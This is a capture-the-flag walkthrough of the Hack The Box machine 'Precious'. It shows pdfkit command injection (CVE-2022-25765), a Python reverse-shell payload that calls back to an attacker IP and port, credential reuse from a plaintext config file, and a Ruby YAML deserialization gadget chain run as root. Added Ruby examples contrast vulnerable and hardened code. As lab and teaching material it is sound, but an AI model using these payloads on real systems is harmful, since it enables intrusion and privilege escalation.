HTB Machine Precious

Port scanning with nmap

  • port 80 is open: it redirects to http://precious.htb/

Add precious.htb to /etc/hosts (pointing at the target IP) so the redirect resolves.

The page offers a "Convert Web Page to PDF" function: you give it a URL and a PDF of that page is downloaded.

Running exiftool on the PDF shows that it was generated by pdfkit v0.8.6.

This version is vulnerable to command injection (CVE-2022-25765, fixed in 0.8.7.2): a URL that already contains a percent-escape such as %20 is assumed to be escaped and is used verbatim, and it is then placed in double quotes inside the shell string that launches wkhtmltopdf. Double quotes do not stop backtick command substitution, so anything between backticks in the URL runs on the server.

Payload (the %20 is required; the command in the backticks is executed by the shell):

```
http://%20`{command}`
```

We can use this to get a reverse shell. Start a listener (here on 10.10.14.40:4444) and submit the following as the URL to convert:

```
http://%20`python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.40",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'`
```

Reference: https://www.revshells.com/
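To see why the %20 matters, here is an added example (my own stripped-down model of the bug class, not pdfkit's source code) that builds the wkhtmltopdf command line the vulnerable way and the hardened way. `wkhtmltopdf` is replaced by `printf` when the commands are actually run, so the demonstration is harmless; the flag layout of the real command is simplified and is an assumption of the example.

```ruby
require "uri"
require "shellwords"

# Added example, not pdfkit's code: models how a URL source reaches the shell.
# RFC2396_Parser is used explicitly so behaviour is identical across Ruby versions.
PARSER = URI::RFC2396_Parser.new

# The flawed heuristic: if unescaping changes the string, the URL is assumed to
# be already escaped and is used verbatim. "%20" trips this, so backticks survive.
def url_needs_escaping?(url)
  PARSER.unescape(url) == url
end

# Vulnerable pattern: the URL is interpolated into one shell string, in double
# quotes. Double quotes do not suppress `...` command substitution.
def vulnerable_command(url, executable = "wkhtmltopdf")
  input = url_needs_escaping?(url) ? PARSER.escape(url) : url
  %(#{executable} "#{input}" -)
end

# Hardened pattern: an argv array. shelljoin escapes every argument if a single
# string is really needed; IO.popen with an array never consults a shell at all.
def safe_argv(url, executable = "wkhtmltopdf")
  [executable, url, "-"]
end

def safe_command(url, executable = "wkhtmltopdf")
  safe_argv(url, executable).shelljoin
end

# Build the injection URL used on the box.
def injected_url(cmd)
  "http://%20`#{cmd}`"
end

# Run both forms with printf standing in for wkhtmltopdf and return the
# arguments exactly as the child process saw them, one per element.
def run_vulnerable(url)
  IO.popen(vulnerable_command(url, "printf '%s\\n'"), &:read).lines.map(&:chomp)
end

def run_safe(url)
  IO.popen(["printf", "%s\n", url, "-"], &:read).lines.map(&:chomp)
end

if __FILE__ == $PROGRAM_NAME
  url = injected_url("id")
  puts vulnerable_command(url) # backticks reach the shell untouched
  puts safe_command(url)       # backticks are backslash-escaped
end
```

`run_vulnerable` shows the substituted output of the injected command in the argument the child receives, while `run_safe` hands the child the literal URL, backticks and all. The fix in pdfkit was the same idea: escape with Shellwords instead of trusting the URL's own percent-encoding.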

We get a shell as the user ruby.

There are two users in /home: ruby and henry.

The user flag is in henry's home directory, which ruby cannot read.

Inside ruby's home directory there is a .bundle/config file, and it contains henry's password in clear text.

We can use that password to SSH in as henry.

sudo -l shows that henry can run /opt/update_dependencies.rb as root with sudo.

The file itself is not writable. Looking at the code, it calls YAML.load on a dependencies.yml file. In Psych versions before 4 (where YAML.load is not the safe loader), !ruby/object tags in the document instantiate arbitrary Ruby classes, so the script is vulnerable to a deserialization attack.

The script reads dependencies.yml from the current working directory, so we write our own dependencies.yml in a directory we control (for example /tmp) and run the script from there.

payload (dependencies.yml):

```yaml
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: cat /root/root.txt
         method_id: :resolve
```

Reference: https://gist.github.com/staaldraad/89dffe369e1454eedd3306edc8a7e565#file-ruby_yaml_load_sploit2-yaml

Now, from the directory containing our dependencies.yml, run the script with sudo:

```
sudo /usr/bin/ruby /opt/update_dependencies.rb
```

The gadget chain ends in Kernel.system with the value of git_set as the command, executed as root, so the root flag is printed to the terminal. Any other command could be put in git_set instead.
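The difference between the loader the script uses and a safe one, as an added example that is not the machine's /opt/update_dependencies.rb: a harmless class stands in for the RubyGems gadget classes, and the two YAML documents are constructed for the demonstration. The point is that the unsafe loader instantiates whatever class the document names, while safe_load refuses the tag before any object exists.

```ruby
require "yaml"

# Added example, not the box's script. A harmless stand-in for the gadget
# classes (Gem::Installer, Net::WriteAdapter, ...) that the real chain abuses.
class Marker
  attr_reader :tag
end

# Constructed documents: what the script expects, and an attacker-controlled tag.
BENIGN_YAML = "---\n- name: pdfkit\n  version: \"0.8.6\"\n"
TAGGED_YAML = "--- !ruby/object:Marker\ntag: attacker-controlled\n"

# What the script effectively does. Psych < 4: YAML.load is the unsafe loader.
# Psych >= 4: YAML.load is safe and the unsafe behaviour moved to unsafe_load.
def load_unsafe(doc)
  YAML.respond_to?(:unsafe_load) ? YAML.unsafe_load(doc) : YAML.load(doc)
end

# Hardened: only scalars, arrays and hashes are permitted. A !ruby/object tag
# raises Psych::DisallowedClass instead of allocating the class.
def load_safe(doc)
  YAML.safe_load(doc)
end

# Returns true when the document would be rejected by the safe loader.
def disallowed?(doc)
  load_safe(doc)
  false
rescue Psych::DisallowedClass
  true
end

if __FILE__ == $PROGRAM_NAME
  obj = load_unsafe(TAGGED_YAML)
  puts "unsafe loader built a #{obj.class} with tag=#{obj.tag.inspect}"
  puts "safe loader rejects the same document: #{disallowed?(TAGGED_YAML)}"
  p load_safe(BENIGN_YAML)
end
```

If the script genuinely needed objects of a known class, `YAML.safe_load(doc, permitted_classes: [Gem::Version])` would allow exactly those and nothing else; the gadget chain needs several RubyGems and Net classes at once, which such an allow-list would never grant.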

:octocat: Happy Hacking :octocat:
